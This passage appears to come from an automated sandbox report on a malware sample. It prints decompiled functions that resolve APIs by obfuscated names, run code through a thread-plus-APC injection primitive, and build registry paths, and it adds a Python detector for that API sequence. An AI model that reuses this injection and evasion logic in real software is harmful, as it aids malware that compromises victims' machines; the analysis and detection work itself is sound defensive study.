                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                            • String ID:
                                                            • API String ID: 1632424568-0
                                                            • Opcode ID: 242e4e89e1c3d3cb9dca64a5b8af9023ce77fb7ba9d496120e40756aae42913d
                                                            • Instruction ID: 186de4d6f4302fee20d8e898ec877abea18fb1bb79dd4aba28bff673c8b7bd4e
                                                            • Opcode Fuzzy Hash: 242e4e89e1c3d3cb9dca64a5b8af9023ce77fb7ba9d496120e40756aae42913d
                                                            • Instruction Fuzzy Hash: F7217FB590060AAFDB50EFB9E884E5A77FCEF46284B004466E945E7301E735E916CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD2039(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _t23;
                                                            				intOrPtr _t26;
                                                            				_Unknown_base(*)()* _t28;
                                                            				intOrPtr _t30;
                                                            				_Unknown_base(*)()* _t32;
                                                            				intOrPtr _t33;
                                                            				_Unknown_base(*)()* _t35;
                                                            				intOrPtr _t36;
                                                            				_Unknown_base(*)()* _t38;
                                                            				intOrPtr _t39;
                                                            				_Unknown_base(*)()* _t41;
                                                            				intOrPtr _t44;
                                                            				struct HINSTANCE__* _t48;
                                                            				intOrPtr _t54;
                                                            
                                                            				_t54 = E00DD77D7(0x20);
                                                            				if(_t54 == 0) {
                                                            					_v8 = 8;
                                                            				} else {
                                                            					_t23 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t1 = _t23 + 0xddb11a; // 0x4c44544e
                                                            					_t48 = GetModuleHandleA(_t1);
                                                            					_t26 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t2 = _t26 + 0xddb787; // 0x7243775a
                                                            					_v8 = 0x7f;
                                                            					_t28 = GetProcAddress(_t48, _t2);
                                                            					 *(_t54 + 0xc) = _t28;
                                                            					if(_t28 == 0) {
                                                            						L8:
                                                            						E00DD77EC(_t54);
                                                            					} else {
                                                            						_t30 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t5 = _t30 + 0xddb774; // 0x614d775a
                                                            						_t32 = GetProcAddress(_t48, _t5);
                                                            						 *(_t54 + 0x10) = _t32;
                                                            						if(_t32 == 0) {
                                                            							goto L8;
                                                            						} else {
                                                            							_t33 =  *0xdda2d4; // 0x2bed5a8
                                                            							_t7 = _t33 + 0xddb797; // 0x6e55775a
                                                            							_t35 = GetProcAddress(_t48, _t7);
                                                            							 *(_t54 + 0x14) = _t35;
                                                            							if(_t35 == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								_t36 =  *0xdda2d4; // 0x2bed5a8
                                                            								_t9 = _t36 + 0xddb756; // 0x4e6c7452
                                                            								_t38 = GetProcAddress(_t48, _t9);
                                                            								 *(_t54 + 0x18) = _t38;
                                                            								if(_t38 == 0) {
                                                            									goto L8;
                                                            								} else {
                                                            									_t39 =  *0xdda2d4; // 0x2bed5a8
                                                            									_t11 = _t39 + 0xddb7ac; // 0x6c43775a
                                                            									_t41 = GetProcAddress(_t48, _t11);
                                                            									 *(_t54 + 0x1c) = _t41;
                                                            									if(_t41 == 0) {
                                                            										goto L8;
                                                            									} else {
                                                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                            										_t44 = E00DD3C64(_t54, _a8); // executed
                                                            										_v8 = _t44;
                                                            										if(_t44 != 0) {
                                                            											goto L8;
                                                            										} else {
                                                            											 *_a12 = _t54;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _v8;
                                                            			}

                                                            0x00dd2048
                                                            0x00dd204c
                                                            0x00dd210e
                                                            0x00dd2052
                                                            0x00dd2052
                                                            0x00dd2057
                                                            0x00dd206a
                                                            0x00dd206c
                                                            0x00dd2071
                                                            0x00dd2079
                                                            0x00dd2080
                                                            0x00dd2084
                                                            0x00dd2087
                                                            0x00dd2106
                                                            0x00dd2107
                                                            0x00dd2089
                                                            0x00dd2089
                                                            0x00dd208e
                                                            0x00dd2096
                                                            0x00dd209a
                                                            0x00dd209d
                                                            0x00000000
                                                            0x00dd209f
                                                            0x00dd209f
                                                            0x00dd20a4
                                                            0x00dd20ac
                                                            0x00dd20b0
                                                            0x00dd20b3
                                                            0x00000000
                                                            0x00dd20b5
                                                            0x00dd20b5
                                                            0x00dd20ba
                                                            0x00dd20c2
                                                            0x00dd20c6
                                                            0x00dd20c9
                                                            0x00000000
                                                            0x00dd20cb
                                                            0x00dd20cb
                                                            0x00dd20d0
                                                            0x00dd20d8
                                                            0x00dd20dc
                                                            0x00dd20df
                                                            0x00000000
                                                            0x00dd20e1
                                                            0x00dd20e7
                                                            0x00dd20ec
                                                            0x00dd20f3
                                                            0x00dd20fa
                                                            0x00dd20fd
                                                            0x00000000
                                                            0x00dd20ff
                                                            0x00dd2102
                                                            0x00dd2102
                                                            0x00dd20fd
                                                            0x00dd20df
                                                            0x00dd20c9
                                                            0x00dd20b3
                                                            0x00dd209d
                                                            0x00dd2087
                                                            0x00dd211c

                                                            APIs
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DD4BF5,?,?,?,?,00000000,00000000), ref: 00DD205E
                                                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DD2080
                                                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DD2096
                                                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DD20AC
                                                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DD20C2
                                                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DD20D8
                                                              • Part of subcall function 00DD3C64: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,00DD20F8), ref: 00DD3CC1
                                                              • Part of subcall function 00DD3C64: memset.NTDLL ref: 00DD3CE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                            • String ID:
                                                            • API String ID: 3012371009-0
                                                            • Opcode ID: 4abca739db59480653d0db6aee919aaaf83d10603bd272fe5bd05bccd66e08f9
                                                            • Instruction ID: e0b10b7089849fb309680e8833004982d17e307491881cc46fb852d7cc34582e
                                                            • Opcode Fuzzy Hash: 4abca739db59480653d0db6aee919aaaf83d10603bd272fe5bd05bccd66e08f9
                                                            • Instruction Fuzzy Hash: E32135B160130AEFDB10DF69CE85E6A7BECEB48344B058467E949C7352E735E9058B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                            				long _v8;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				char _t9;
                                                            				void* _t10;
                                                            				void* _t18;
                                                            				void* _t23;
                                                            				void* _t36;
                                                            
                                                            				_push(__ecx);
                                                            				_t9 = _a8;
                                                            				_v8 = 1;
                                                            				if(_t9 == 0) {
                                                            					_t10 = InterlockedDecrement(0x6e4b4188);
                                                            					__eflags = _t10;
                                                            					if(_t10 == 0) {
                                                            						__eflags =  *0x6e4b418c;
                                                            						if( *0x6e4b418c != 0) {
                                                            							_t36 = 0x2328;
                                                            							while(1) {
                                                            								SleepEx(0x64, 1);
                                                            								__eflags =  *0x6e4b4198;
                                                            								if( *0x6e4b4198 == 0) {
                                                            									break;
                                                            								}
                                                            								_t36 = _t36 - 0x64;
                                                            								__eflags = _t36;
                                                            								if(_t36 > 0) {
                                                            									continue;
                                                            								}
                                                            								break;
                                                            							}
                                                            							CloseHandle( *0x6e4b418c);
                                                            						}
                                                            						HeapDestroy( *0x6e4b4190);
                                                            					}
                                                            				} else {
                                                            					if(_t9 == 1 && InterlockedIncrement(0x6e4b4188) == 1) {
                                                            						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                            						_t41 = _t18;
                                                            						 *0x6e4b4190 = _t18;
                                                            						if(_t18 == 0) {
                                                            							L6:
                                                            							_v8 = 0;
                                                            						} else {
                                                            							 *0x6e4b41b0 = _a4;
                                                            							asm("lock xadd [eax], edi");
                                                            							_push( &_a8);
                                                            							_t23 = E6E4B1000(E6E4B1FC9, E6E4B19C4(_a12, 1, 0x6e4b4198, _t41));
                                                            							 *0x6e4b418c = _t23;
                                                            							if(_t23 == 0) {
                                                            								asm("lock xadd [esi], eax");
                                                            								goto L6;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _v8;
                                                            			}

                                                            0x6e4b17c7
                                                            0x6e4b17d3
                                                            0x6e4b17d5
                                                            0x6e4b17d8
                                                            0x6e4b184e
                                                            0x6e4b1854
                                                            0x6e4b1856
                                                            0x6e4b1858
                                                            0x6e4b185e
                                                            0x6e4b1860
                                                            0x6e4b1865
                                                            0x6e4b1868
                                                            0x6e4b1873
                                                            0x6e4b1875
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1877
                                                            0x6e4b187a
                                                            0x6e4b187c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b187c
                                                            0x6e4b1884
                                                            0x6e4b1884
                                                            0x6e4b1890
                                                            0x6e4b1890
                                                            0x6e4b17da
                                                            0x6e4b17db
                                                            0x6e4b17fb
                                                            0x6e4b1801
                                                            0x6e4b1803
                                                            0x6e4b1808
                                                            0x6e4b1844
                                                            0x6e4b1844
                                                            0x6e4b180a
                                                            0x6e4b1812
                                                            0x6e4b1819
                                                            0x6e4b1823
                                                            0x6e4b182f
                                                            0x6e4b1836
                                                            0x6e4b183b
                                                            0x6e4b1840
                                                            0x00000000
                                                            0x6e4b1840
                                                            0x6e4b183b
                                                            0x6e4b1808
                                                            0x6e4b17db
                                                            0x6e4b189d

                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(6E4B4188), ref: 6E4B17E6
                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E4B17FB
                                                              • Part of subcall function 6E4B1000: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E4B4198,6E4B1834), ref: 6E4B1017
                                                              • Part of subcall function 6E4B1000: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E4B102C
                                                              • Part of subcall function 6E4B1000: GetLastError.KERNEL32(00000000), ref: 6E4B1037
                                                              • Part of subcall function 6E4B1000: TerminateThread.KERNEL32(00000000,00000000), ref: 6E4B1041
                                                              • Part of subcall function 6E4B1000: CloseHandle.KERNEL32(00000000), ref: 6E4B1048
                                                              • Part of subcall function 6E4B1000: SetLastError.KERNEL32(00000000), ref: 6E4B1051
                                                            • InterlockedDecrement.KERNEL32(6E4B4188), ref: 6E4B184E
                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 6E4B1868
                                                            • CloseHandle.KERNEL32 ref: 6E4B1884
                                                            • HeapDestroy.KERNEL32 ref: 6E4B1890
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                            • String ID:
                                                            • API String ID: 2110400756-0
                                                            • Opcode ID: 26845f1b4e41920de89ff390f11e187c961b9ed63ab58a5ab3245377e5a60fb7
                                                            • Instruction ID: 8eddd8c9642467362b5ed95fb8660b0c68649375f85bdd7493896bf954bcecf5
                                                            • Opcode Fuzzy Hash: 26845f1b4e41920de89ff390f11e187c961b9ed63ab58a5ab3245377e5a60fb7
                                                            • Instruction Fuzzy Hash: 1D215E71E00A45ABCF40AFFAEC8CE597BB8FF663E5710456AE509D2344E77099068B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,04580483), ref: 0456E109
                                                            • QueueUserAPC.KERNELBASE(?,00000000,04575ADA,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E11E
                                                            • GetLastError.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E129
                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E133
                                                            • CloseHandle.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E13A
                                                            • SetLastError.KERNEL32(00000000,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0456E143
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 3832013932-0
                                                            • Opcode ID: 4bb2d3f95ed624376fb5e9ff2098e5a76ff9f2b2b2a962da4b2b0689be46c2a3
                                                            • Instruction ID: 55c030814c8291992e31dc40ecb47fbd6a3221b5cef2c42867483e22dec7cbc9
                                                            • Opcode Fuzzy Hash: 4bb2d3f95ed624376fb5e9ff2098e5a76ff9f2b2b2a962da4b2b0689be46c2a3
                                                            • Instruction Fuzzy Hash: 35F01C32605221EBD7225FA0AC48F5FBEA9FF08752F05541CF606B1251DB399C18BBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			// Execution primitive: start a thread whose entry point is SleepEx (a wait that can be
                                                            			// alertable), then queue the caller-supplied routine as a user-mode APC on that thread.
                                                            			// A user APC is delivered when its target thread performs an alertable wait, so the
                                                            			// routine runs inside the new thread while the thread's start address is only SleepEx.
                                                            			E6E4B1000(long _a4, DWORD* _a12) {
                                                            				_Unknown_base(*)()* _v0; // APC routine (slot not resolved by the decompiler)
                                                            				void* _t4;
                                                            				long _t6;
                                                            				long _t11;
                                                            				void* _t13;
                                                            
                                                            				// lpStartAddress = SleepEx, lpParameter = dwMilliseconds read from the global at 0x6e4b41cc,
                                                            				// _a12 receives the new thread id
                                                            				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e4b41cc, 0, _a12); // executed
                                                            				_t13 = _t4;
                                                            				if(_t13 != 0) {
                                                            					// queue _v0 on the fresh thread; _a4 is the argument the APC routine receives
                                                            					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                            					if(_t6 == 0) {
                                                            						// queueing failed: tear the thread down but hand the original error code back to the caller
                                                            						_t11 = GetLastError();
                                                            						TerminateThread(_t13, _t11);
                                                            						CloseHandle(_t13);
                                                            						_t13 = 0;
                                                            						SetLastError(_t11);
                                                            					}
                                                            				}
                                                            				return _t13; // thread handle on success, 0 on failure
                                                            			}
                                                            Instruction addresses, one per decompiled line above in listing order:
                                                            0x6e4b1017 0x6e4b101d 0x6e4b1021 0x6e4b102c 0x6e4b1034 0x6e4b103d 0x6e4b1041 0x6e4b1048
                                                            0x6e4b104f 0x6e4b1051 0x6e4b1057 0x6e4b1034 0x6e4b105b

                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E4B4198,6E4B1834), ref: 6E4B1017
                                                            • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E4B102C
                                                            • GetLastError.KERNEL32(00000000), ref: 6E4B1037
                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 6E4B1041
                                                            • CloseHandle.KERNEL32(00000000), ref: 6E4B1048
                                                            • SetLastError.KERNEL32(00000000), ref: 6E4B1051
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 3832013932-0
                                                            • Opcode ID: 55152de37d06eaf167af31a66ed38fbb3e53e0d6833b3c49909e0f9ef3b1b73f
                                                            • Instruction ID: b6d2115efb162498cd002e49e893e36e5c66710586667bbff5477d06233e09f0
                                                            • Opcode Fuzzy Hash: 55152de37d06eaf167af31a66ed38fbb3e53e0d6833b3c49909e0f9ef3b1b73f
                                                            • Instruction Fuzzy Hash: 44F08232908E21BBCB216FB6AC4CF4BBF68FF0A752F004405FA0591148D7B198189BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
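The two E6E4B1000-style listings above (refs 0456E109/0456E11E and 6E4B1017/6E4B102C) show the same call shape: CreateThread immediately followed by QueueUserAPC on the returned handle. The Python below is an added example, written for this edit and not part of the Joe Sandbox report or of the sample, that parses API lines in the report's own "• Name.Module(args), ref: ADDR" format and flags that sequence. The sample trace is constructed from the six lines printed for E6E4B1000 plus one "Part of subcall function" line of the kind the report prints for callees; the four-call window is an assumed tolerance so that the GetLastError/TerminateThread cleanup on the failure path, or an interleaved unrelated call, does not break the match.

```python
import re
from dataclasses import dataclass

# Constructed sample in the report's "APIs" line format: the six calls listed for
# E6E4B1000 above, plus one "Part of subcall function" line of the kind the report
# prints for callees, which the detector must not treat as a direct call.
SAMPLE_TRACE = """\
• CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E4B4198,6E4B1834), ref: 6E4B1017
• QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E4B102C
• GetLastError.KERNEL32(00000000), ref: 6E4B1037
• TerminateThread.KERNEL32(00000000,00000000), ref: 6E4B1041
• CloseHandle.KERNEL32(00000000), ref: 6E4B1048
• SetLastError.KERNEL32(00000000), ref: 6E4B1051
  • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00DD77F8
"""

LINE_RE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int        # call-site address printed after "ref:"
    subcall: bool   # True for lines the report attributes to a callee


def parse_trace(text):
    """Parse report-style API lines, keeping their order (sequence detection depends on it)."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls


def find_apc_injection(calls, window=4):
    """Return (CreateThread ref, QueueUserAPC ref) pairs for each CreateThread followed,
    within `window` direct calls, by QueueUserAPC: the "new thread + user APC" primitive.
    Subcall lines are dropped first so callee noise cannot push the pair out of the window."""
    direct = [c for c in calls if not c.subcall]
    hits = []
    for i, c in enumerate(direct):
        if c.api != "CreateThread":
            continue
        for later in direct[i + 1:i + 1 + window]:
            if later.api == "QueueUserAPC":
                hits.append((c.ref, later.ref))
                break
    return hits


def describe(hits):
    """Human-readable finding per detected pair."""
    return [f"APC injection primitive: CreateThread@{a:08X} -> QueueUserAPC@{b:08X}" for a, b in hits]


if __name__ == "__main__":
    for finding in describe(find_apc_injection(parse_trace(SAMPLE_TRACE))):
        print(finding)
```

The same parser works on the 0456E109/0456E11E listing further up; only the order of the two calls matters, not the argument values, which the report mostly prints as `?` or `00000000` for this pair.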

                                                            C-Code - Quality: 88%
                                                            			// Registry path builder: selects the hive (0x80000002 = HKEY_LOCAL_MACHINE when _a16 == 0,
                                                            			// 0x80000003 = HKEY_USERS otherwise), validates the caller's key name, then passes the hive
                                                            			// and the wide-string names to the helpers E00DD15D7 / E00DD2A18 / E00DD2A5C.
                                                            			// The dword comments are little-endian ASCII: 0x4d4c4b48 = "HKLM", 0x55434b48 = "HKCU",
                                                            			// 0x74666f53 = "Soft". Return value 8 is ERROR_NOT_ENOUGH_MEMORY.
                                                            			E00DD5AFA(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				signed int* _v16;
                                                            				char _v284;
                                                            				void* __esi;
                                                            				char* _t59;
                                                            				intOrPtr* _t60;
                                                            				void* _t62;
                                                            				intOrPtr _t64;
                                                            				char _t65;
                                                            				void* _t67;
                                                            				intOrPtr _t68;
                                                            				intOrPtr _t69;
                                                            				intOrPtr _t71;
                                                            				void* _t73;
                                                            				signed int _t81;
                                                            				void* _t91;
                                                            				void* _t92;
                                                            				char _t98;
                                                            				signed int* _t100;
                                                            				intOrPtr* _t101;
                                                            				void* _t102;
                                                            
                                                            				_t92 = __ecx;
                                                            				_v8 = _v8 & 0x00000000;
                                                            				_t98 = _a16;
                                                            				if(_t98 == 0) {
                                                            					__imp__( &_v284,  *0xdda38c); // lstrcpy (APIs: ref 00DD5B7C): copy the global name at 0xdda38c into the path buffer
                                                            					_t91 = 0x80000002; // HKEY_LOCAL_MACHINE
                                                            					L6:
                                                            					_t59 = E00DD5691( &_v284,  &_v284); // ANSI -> wide copy on the heap (subcalls: lstrlen, mbstowcs, memset)
                                                            					_a8 = _t59;
                                                            					if(_t59 == 0) {
                                                            						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                            						L29:
                                                            						_t60 = _a20;
                                                            						if(_t60 != 0) {
                                                            							 *_t60 =  *_t60 + 1; // optional out-counter incremented on every exit path
                                                            						}
                                                            						return _v8;
                                                            					}
                                                            					_t101 = _a24;
                                                            					_t62 = E00DD611E(_t92, _t97, _t101, _t91, _t59); // executed
                                                            					if(_t62 != 0) {
                                                            						L27:
                                                            						E00DD77EC(_a8); // RtlFreeHeap
                                                            						goto L29;
                                                            					}
                                                            					_t64 =  *0xdda2cc; // 0x39c9d00
                                                            					_t16 = _t64 + 0xc; // 0x39c9df4
                                                            					_t65 = E00DD5691(_t64,  *_t16);
                                                            					_a24 = _t65;
                                                            					if(_t65 == 0) {
                                                            						L14:
                                                            						_t29 = _t101 + 0x14; // 0x102
                                                            						_t33 = _t101 + 0x10; // 0x3d00dd90, executed
                                                            						_t67 = E00DD2A18(_t97,  *_t33, _t91, _a8,  *0xdda384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                                            						if(_t67 == 0) {
                                                            							_t68 =  *0xdda2d4; // 0x2bed5a8
                                                            							if(_t98 == 0) {
                                                            								_t35 = _t68 + 0xddb9ef; // 0x4d4c4b48 = "HKLM"
                                                            								_t69 = _t35;
                                                            							} else {
                                                            								_t34 = _t68 + 0xddb907; // 0x55434b48 = "HKCU"
                                                            								_t69 = _t34;
                                                            							}
                                                            							if(E00DD3D9E(_t69,  *0xdda384,  *0xdda388,  &_a24,  &_a16) == 0) {
                                                            								if(_t98 == 0) {
                                                            									_t71 =  *0xdda2d4; // 0x2bed5a8
                                                            									_t44 = _t71 + 0xddb892; // 0x74666f53 = "Soft"
                                                            									_t73 = E00DD5691(_t44, _t44);
                                                            									_t99 = _t73;
                                                            									if(_t73 == 0) {
                                                            										_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                            									} else {
                                                            										_t47 = _t101 + 0x10; // 0x3d00dd90
                                                            										E00DD2A5C( *_t47, _t91, _a8,  *0xdda388, _a24);
                                                            										_t49 = _t101 + 0x10; // 0x3d00dd90
                                                            										E00DD2A5C( *_t49, _t91, _t99,  *0xdda380, _a16);
                                                            										E00DD77EC(_t99);
                                                            									}
                                                            								} else {
                                                            									_t40 = _t101 + 0x10; // 0x3d00dd90
                                                            									E00DD2A5C( *_t40, _t91, _a8,  *0xdda388, _a24);
                                                            									_t43 = _t101 + 0x10; // 0x3d00dd90, executed
                                                            									E00DD2A5C( *_t43, _t91, _a8,  *0xdda380, _a16); // executed
                                                            								}
                                                            								if( *_t101 != 0) {
                                                            									E00DD77EC(_a24);
                                                            								} else {
                                                            									 *_t101 = _a16;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L27;
                                                            					}
                                                            					_t21 = _t101 + 0x10; // 0x3d00dd90, executed
                                                            					_t81 = E00DD15D7( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                                            					if(_t81 == 0) {
                                                            						_t100 = _v16;
                                                            						if(_v12 == 0x28) { // existing value is exactly 40 bytes
                                                            							 *_t100 =  *_t100 & _t81; // clear its first dword (_t81 == 0 here)
                                                            							_t26 = _t101 + 0x10; // 0x3d00dd90
                                                            							E00DD2A18(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                            						}
                                                            						E00DD77EC(_t100);
                                                            						_t98 = _a16;
                                                            					}
                                                            					E00DD77EC(_a24);
                                                            					goto L14;
                                                            				}
                                                            				// Reject key names of 8 chars or fewer, names that would no longer fit in MAX_PATH (0x104)
                                                            				// with the 0x2a-byte suffix, and names containing '_' (0x5f).
                                                            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                            					goto L29;
                                                            				} else {
                                                            					_t97 = _a8;
                                                            					E00DD7801(_t98, _a8,  &_v284);
                                                            					__imp__(_t102 + _t98 - 0x117,  *0xdda38c); // lstrcpy (APIs: ref 00DD5B5A): append the global name after the caller's
                                                            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c; // '\\' separator between the two components
                                                            					_t91 = 0x80000003; // HKEY_USERS
                                                            					goto L6;
                                                            				}
                                                            			}
                                                            Instruction addresses, one per decompiled line above in listing order (0x00000000 marks lines such as goto that carry no instruction of their own):
                                                            0x00dd5afa 0x00dd5b03 0x00dd5b0a 0x00dd5b0f 0x00dd5b7c 0x00dd5b82 0x00dd5b87 0x00dd5b8e
                                                            0x00dd5b95 0x00dd5b98 0x00dd5d03 0x00dd5d0a 0x00dd5d0a 0x00dd5d0f 0x00dd5d11 0x00dd5d11
                                                            0x00dd5d1a 0x00dd5d1a 0x00dd5b9e 0x00dd5ba3 0x00dd5baa 0x00dd5cf9 0x00dd5cfc 0x00000000
                                                            0x00dd5cfc 0x00dd5bb0 0x00dd5bb5 0x00dd5bb8 0x00dd5bbf 0x00dd5bc2 0x00dd5c0b 0x00dd5c0b
                                                            0x00dd5c1e 0x00dd5c21 0x00dd5c28 0x00dd5c30 0x00dd5c35 0x00dd5c3f 0x00dd5c3f 0x00dd5c37
                                                            0x00dd5c37 0x00dd5c37 0x00dd5c37 0x00dd5c61 0x00dd5c69 0x00dd5c97 0x00dd5c9c 0x00dd5ca3
                                                            0x00dd5ca8 0x00dd5cac 0x00dd5cde 0x00dd5cae 0x00dd5cbb 0x00dd5cbe 0x00dd5cce 0x00dd5cd1
                                                            0x00dd5cd7 0x00dd5cd7 0x00dd5c6b 0x00dd5c78 0x00dd5c7b 0x00dd5c8d 0x00dd5c90 0x00dd5c90
                                                            0x00dd5ce8 0x00dd5cf4 0x00dd5cea 0x00dd5ced 0x00dd5ced 0x00dd5ce8 0x00dd5c61 0x00000000
                                                            0x00dd5c28 0x00dd5bd1 0x00dd5bd4 0x00dd5bdb 0x00dd5be1 0x00dd5be4 0x00dd5be6 0x00dd5bf2
                                                            0x00dd5bf5 0x00dd5bf5 0x00dd5bfb 0x00dd5c00 0x00dd5c00 0x00dd5c06 0x00000000 0x00dd5c06
                                                            0x00dd5b14 0x00000000 0x00dd5b3b 0x00dd5b3b 0x00dd5b47 0x00dd5b5a 0x00dd5b60 0x00dd5b68
                                                            0x00000000 0x00dd5b68

                                                            APIs
                                                            • StrChrA.SHLWAPI(00DD17B3,0000005F,00000000,00000000,00000104), ref: 00DD5B2D
                                                            • lstrcpy.KERNEL32(?,?), ref: 00DD5B5A
                                                              • Part of subcall function 00DD5691: lstrlen.KERNEL32(?,00000000,039C9D00,745EC740,00DD291A,039C9F05,00DD5FB9,00DD5FB9,?,00DD5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 00DD5698
                                                              • Part of subcall function 00DD5691: mbstowcs.NTDLL ref: 00DD56C1
                                                              • Part of subcall function 00DD5691: memset.NTDLL ref: 00DD56D3
                                                              • Part of subcall function 00DD2A5C: lstrlenW.KERNEL32(?,?,?,00DD5CC3,3D00DD90,80000002,00DD17B3,00DD462D,74666F53,4D4C4B48,00DD462D,?,3D00DD90,80000002,00DD17B3,?), ref: 00DD2A81
